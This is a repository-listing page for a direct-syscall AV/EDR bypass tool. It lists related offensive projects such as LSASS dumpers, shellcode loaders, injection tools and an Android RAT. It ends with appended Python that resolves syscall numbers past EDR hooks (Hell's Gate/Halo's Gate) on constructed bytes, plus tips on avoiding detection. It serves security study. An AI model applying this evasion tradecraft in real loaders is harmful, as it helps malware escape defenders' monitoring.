Direct syscalls Injection to bypass AV/EDR
☆11 · May 18, 2024 · Updated last year
Alternatives and similar repositories for on-disk-detection-bypass
- "D3MPSEC" is a memory dumping tool designed to extract a memory dump from the LSASS process using various techniques, including direct system c… ☆28 · Sep 18, 2024 · Updated last year
- A tool to assist DLL hijacking via the Havoc GUI ☆12 · Jan 9, 2024 · Updated 2 years ago
- DLL hijacking and mock-directory technique to bypass the Windows UAC security feature and get a high-privilege reverse shell. Secu… ☆42 · May 18, 2024 · Updated last year
- String/file/shellcode encryptor using AES/XOR ☆11 · Oct 15, 2023 · Updated 2 years ago
- A proof-of-concept to demonstrate randomized execution paths and their impact on call stack signatures, ideal for EDR testing, behavior-… ☆25 · Jan 17, 2026 · Updated last month
- Malware persistence via COM DLL hijacking. C++ implementation example ☆13 · May 2, 2022 · Updated 3 years ago
- Process injection via KernelCallbackTable ☆13 · Jan 28, 2022 · Updated 4 years ago
- NimReflectiveLoader is a Nim-based tool for in-memory DLL execution using Reflective DLL Loading. ☆31 · Jan 21, 2024 · Updated 2 years ago
- Using syscalls to load shellcode; evasion techniques ☆27 · Jul 18, 2021 · Updated 4 years ago
- This exploit uses the AddressOfEntryPoint of a process, which is RX, and uses WriteProcessMemory internal magic to change the permission… ☆18 · Oct 31, 2024 · Updated last year
- ☆18 · Sep 1, 2025 · Updated 6 months ago
- BloodyAv is a custom shellcode loader to bypass AV and EDR. ☆14 · Mar 21, 2022 · Updated 3 years ago
- Example of async client/server sockets in .NET 5 ☆17 · Jun 9, 2021 · Updated 4 years ago
- Windows process injection methods ☆18 · Jul 18, 2021 · Updated 4 years ago
- Transparently call NTAPI via Halo's Gate with indirect syscalls. ☆15 · Apr 26, 2024 · Updated last year
- Bypass Malware Time Delays ☆107 · Sep 23, 2022 · Updated 3 years ago
- A Multilayered AV/EDR Evasion Framework and AV Testing Tool. ☆18 · Jun 28, 2025 · Updated 8 months ago
- Collection of Offensive C# Tooling ☆13 · Nov 4, 2021 · Updated 4 years ago
- Another Portable Executable file analysis project ☆21 · May 28, 2011 · Updated 14 years ago
- MalDev & AV/EDR Evasion for Pentesters ☆20 · Feb 17, 2023 · Updated 3 years ago
- 7 days of Red Teaming TTPs that your favorite tools may use to achieve a post-exploitation goal ☆18 · Apr 17, 2021 · Updated 4 years ago
- Beacon Object File implementation of Yaxser's Backstab ☆15 · Mar 9, 2022 · Updated 3 years ago
- Bypass Windows Defender syscall ☆18 · Jul 17, 2021 · Updated 4 years ago
- This is the combination of multiple evasion techniques to evade defenses. (Dirty Vanity) ☆51 · May 8, 2024 · Updated last year
- Get-PDInvokeImports is a tool (PowerShell module) which is able to perform automatic detection of P/Invoke, Dynamic P/Invoke and D/Invoke u… ☆54 · Apr 10, 2022 · Updated 3 years ago
- AhMyth is a popular open-source Android RAT. But the official AhMyth contains many bugs. For example, you can't fetch the victim's files … ☆23 · Jan 30, 2021 · Updated 5 years ago
- This repository contains the analysis reports, technical details or any tools created for helping in malware analysis. Additionally, the … ☆23 · Jun 17, 2025 · Updated 8 months ago
- Mythic C2 wrapper for NimSyscallPacker ☆25 · Mar 12, 2025 · Updated 11 months ago
- Some of the techniques used in Windows malware: persistence (Registry HKCU, startup), disabling Windows Firewall, disabling Windows Defender ☆23 · Nov 20, 2022 · Updated 3 years ago
- Abusing the Windows fork API and the OneDrive.exe process to inject malicious shellcode without allocating a new RWX memory region. ☆289 · May 27, 2024 · Updated last year
- A C# project that builds a Web Application which redirects all HTTPS ☆26 · Feb 11, 2025 · Updated last year
- Malicious PowerShell script loader designed to avoid detection. ☆61 · Jun 16, 2023 · Updated 2 years ago
- Slides and POC demo for my talk at Divizion Zero on EDR evasion titled "Evasion Adventures" ☆31 · Jan 14, 2023 · Updated 3 years ago
- Detect userland hooks placed by AV/EDR ☆28 · Sep 4, 2023 · Updated 2 years ago
- A public repository of MITRE ATT&CK TTP mappings by BushidoUK for OSINT reports that lack a section breaking down the TTPs. ☆27 · Mar 20, 2025 · Updated 11 months ago
- ☆64 · Jan 2, 2024 · Updated 2 years ago
- Citrix Phishlet ☆24 · Feb 2, 2021 · Updated 5 years ago
- Impacket is a collection of Python classes for working with network protocols. ☆31 · Jun 27, 2024 · Updated last year
- Satanic Crypter: a powerful tool designed to convert EXE files into BAT files with advanced features and a modern GUI interface. ☆11 · Jan 4, 2025 · Updated last year
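The page's own topic, direct syscalls, and two of the related entries (the Halo's Gate indirect-syscall caller and the userland-hook detector) rest on one mechanic: reading the system service number (SSN) out of an Nt* stub in ntdll, and, when an EDR has overwritten that stub with a `jmp`, deriving it from an unhooked neighbour. The following Python is an added illustration of that mechanic, not code from on-disk-detection-bypass or any repository listed above. It runs offline on a constructed, fake slice of ntdll's `.text` (four 32-byte stubs, two of them hooked) rather than on a real ntdll; the 32-byte stub spacing and the `mov r10, rcx / mov eax, imm32` prologue are the x64 Windows 10+ layout, and the neighbour walk assumes, as Halo's Gate does, that ntdll lays Nt* stubs out in ascending SSN order.

```python
"""Hell's Gate / Halo's Gate style SSN resolution over a constructed ntdll-like byte slice.

All bytes below are constructed for the example; none are copied from a real ntdll.
"""
import struct

STUB_SIZE = 32                        # Nt* stubs in x64 ntdll are 32 bytes apart
PROLOGUE = bytes.fromhex("4C8BD1B8")  # mov r10, rcx ; mov eax, imm32
JMP_REL32 = 0xE9                      # opcode EDRs commonly use for inline hooks


def make_clean_stub(ssn: int) -> bytes:
    """Constructed x64 ntdll-style syscall stub, padded with int3 to STUB_SIZE."""
    body = (PROLOGUE + struct.pack("<I", ssn)
            + bytes.fromhex("F604250803FE7F01")  # test byte ptr [0x7FFE0308], 1
            + bytes.fromhex("7503")              # jne  +3
            + bytes.fromhex("0F05")              # syscall
            + b"\xC3"                            # ret
            + bytes.fromhex("CD2E")              # int  2Eh
            + b"\xC3")                           # ret
    return body.ljust(STUB_SIZE, b"\xCC")


def make_hooked_stub(ssn: int, rel32: int = 0x11223344) -> bytes:
    """Same stub with its first five bytes replaced by an EDR-style jmp rel32 trampoline."""
    clean = make_clean_stub(ssn)
    return bytes([JMP_REL32]) + struct.pack("<I", rel32) + clean[5:]


def is_hooked(stub: bytes) -> bool:
    # jmp at the very start, or placed just after `mov r10, rcx` (both seen in the wild)
    return stub[0] == JMP_REL32 or stub[3] == JMP_REL32


def read_ssn(stub: bytes):
    """Hell's Gate: read the imm32 of `mov eax, ssn` if the prologue is intact, else None."""
    if stub[:4] == PROLOGUE:
        return struct.unpack("<I", stub[4:8])[0]
    return None


def resolve_ssn(text: bytes, offset: int, max_hops: int = 500):
    """Halo's Gate: if the stub at `offset` is hooked, walk neighbouring stubs and
    correct by the distance walked (SSNs increase by one per stub in ntdll's layout)."""
    stub = text[offset:offset + STUB_SIZE]
    if not is_hooked(stub):
        ssn = read_ssn(stub)
        if ssn is not None:
            return ssn
    for hop in range(1, max_hops + 1):
        for direction in (1, -1):
            pos = offset + direction * hop * STUB_SIZE
            if pos < 0 or pos + STUB_SIZE > len(text):
                continue
            neighbor = text[pos:pos + STUB_SIZE]
            if is_hooked(neighbor):
                continue
            n_ssn = read_ssn(neighbor)
            if n_ssn is not None:
                return n_ssn - direction * hop
    return None


def build_direct_syscall_stub(ssn: int) -> bytes:
    """Bytes a loader would place in executable memory and call with the Nt* arguments:
    mov r10, rcx ; mov eax, ssn ; syscall ; ret. This is what 'direct syscall' means."""
    return PROLOGUE + struct.pack("<I", ssn) + bytes.fromhex("0F05C3")


def demo():
    """Constructed .text slice: four consecutive Nt* stubs with SSNs 0x18..0x1B,
    the middle two hooked. Returns {stub offset: resolved SSN}."""
    layout = [(0x18, False), (0x19, True), (0x1A, True), (0x1B, False)]
    text = b"".join(make_hooked_stub(s) if h else make_clean_stub(s) for s, h in layout)
    return {i * STUB_SIZE: resolve_ssn(text, i * STUB_SIZE) for i in range(len(layout))}


if __name__ == "__main__":
    for off, ssn in demo().items():
        print(f"stub @ +0x{off:02X}: SSN 0x{ssn:02X}")
```

Two practitioner caveats. First, `is_hooked` only recognises the `E9` pattern; hooks that use `FF 25` (jmp [rip+disp32]) or that patch deeper into the stub need extra checks, and a stub that is hooked but still has its `mov eax, imm32` intact will be mis-read unless the hook check runs first, which is why `resolve_ssn` checks for a hook before trusting `read_ssn`. Second, executing `syscall` from memory that is not ntdll's own `.text` is itself a detection signal (the return address on the call stack lands outside ntdll); that is the gap the "indirect syscall" entry above addresses by jumping to a genuine `syscall; ret` gadget inside ntdll instead of emitting the instruction in the loader.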